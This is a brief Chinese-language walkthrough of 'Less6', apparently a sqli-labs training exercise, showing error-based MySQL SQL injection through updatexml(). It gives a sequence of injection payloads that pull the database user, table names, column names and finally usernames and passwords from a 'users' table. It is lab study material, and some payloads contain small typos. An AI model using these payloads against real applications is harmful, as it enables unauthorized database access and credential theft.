Less6
选择报错注入
1、准备工作
数据库用户权限
?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)%23
当前数据库
?id=1' updatexml(1,concat(0x7e,(select database()),0x7e),1)
2、获取表名
获取第一个表名
id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)
获取第二个表名
id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1)
······
3、获取列名
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1)%23
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1)%23
······
4、获取数据
?id=-1' and updatexml(1,concat(0x7e,(select concat(username,password) from users limit 0,1) ,0x7e),1)%23
``?id=-1’ and updatexml(1,concat(0x7e,(select concat(username,password) from users limit 1,1) ,0x7e),1)%23`
······